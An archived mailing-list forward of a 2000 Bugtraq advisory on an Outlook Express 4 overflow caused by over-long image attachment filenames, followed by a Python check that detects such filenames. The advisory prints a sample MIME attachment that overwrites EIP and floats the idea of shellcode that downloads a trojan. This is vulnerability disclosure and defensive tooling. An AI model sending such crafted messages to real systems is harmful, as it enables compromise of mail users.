[Esa-l] Overflow in Outlook Express 4.* - too long filenames with graphic format extension (fwd)

John D. Hardin jhardin at wolfenet.com
Sat May 13 16:33:23 PDT 2000


And another...

---------- Forwarded message ----------
Date: Fri, 12 May 2000 14:05:28 +0200
From: Ultor <Ultor at HERT.ORG>
To: BUGTRAQ at SECURITYFOCUS.COM
Subject: Overflow in Outlook Express 4.* - too long filenames with graphic format extension

==== APPLICATION AFFECTED

Outlook Express 4.* (5.* is not affected)

==== DESCRIPTION

All attached graphic files are automatically shown in Outlook Express
while viewing the e-mail. The problem is that long filenames with a *.jpg or
*.bmp extension cause an overflow if the filename length is longer than 256
characters.

==== EXAMPLE

We need more than 267 characters to overwrite EIP because of 'C:\TEMP' at the
beginning of the buffer. This causes a little problem with exploitation. Here is
an example of such an e-mail:

------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"

------=_NextPart_000_0008_01BF5479.70140740--

EIP is overwritten here by 'BBBB'.

==== EXPLOITATION

It's a little hard to exploit because the buffer is addressed at an address with '00'
and we have 'C:\TEMP' which overwrites the stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with a worm, because you would only have to view the message to
run the exploit. Using shellcode which downloads a trojan from some URL onto the
affected machine would be an interesting idea too.


Greetz to HERT, Lam3rZ, TESO

----------------------
Mark Bialoglowy [Ultor at hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
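A mail-gateway check for the condition the advisory describes (a .jpg/.bmp attachment filename longer than 256 characters), written here as an added example; it is not part of the original post or any HERT tool, and the boundary, addresses and base64 stub in the constructed sample are placeholders:

```python
"""Flag MIME attachments whose filename matches the Outlook Express 4 overflow
condition from the advisory: a graphic extension and more than 256 characters."""
import email

GRAPHIC_EXTENSIONS = (".jpg", ".bmp")
MAX_SAFE_LEN = 256   # the advisory's threshold for the overflowing filename


def risky_filenames(raw_message: str) -> list:
    """Return (filename, length) for every attachment that could trigger the bug."""
    msg = email.message_from_string(raw_message)
    hits = []
    for part in msg.walk():
        # get_filename() reads Content-Disposition, unquotes the parameter and
        # reassembles RFC 2231 continuations, so split-up names are still measured
        name = part.get_filename()
        if name is None:
            continue
        if name.lower().endswith(GRAPHIC_EXTENSIONS) and len(name) > MAX_SAFE_LEN:
            hits.append((name, len(name)))
    return hits


def build_sample(filename: str) -> str:
    """Constructed message in the shape of the advisory's example (hypothetical boundary)."""
    boundary = "----=_Example_Boundary"
    return (
        "From: sender@example.test\r\n"
        "To: recipient@example.test\r\n"
        "Subject: test\r\n"
        "MIME-Version: 1.0\r\n"
        f'Content-Type: multipart/mixed; boundary="{boundary}"\r\n'
        "\r\n"
        f"--{boundary}\r\n"
        "Content-Type: text/plain\r\n"
        "\r\n"
        "body\r\n"
        f"--{boundary}\r\n"
        'Content-Type: image/jpeg; name="hert.jpg"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        f'Content-Disposition: attachment; filename="{filename}"\r\n'
        "\r\n"
        "/9j/4AAQSkZJRg==\r\n"   # placeholder, not a real image
        f"--{boundary}--\r\n"
    )


# Mirrors the advisory's pattern: 4 A's, 4 B's, padding, then the extension (292 chars)
OVERFLOW_NAME = "AAAA" + "BBBB" + "A" * 280 + ".jpg"
BENIGN_NAME = "holiday.jpg"

if __name__ == "__main__":
    for name in (OVERFLOW_NAME, BENIGN_NAME):
        print(name[:12], "...", risky_filenames(build_sample(name)))
```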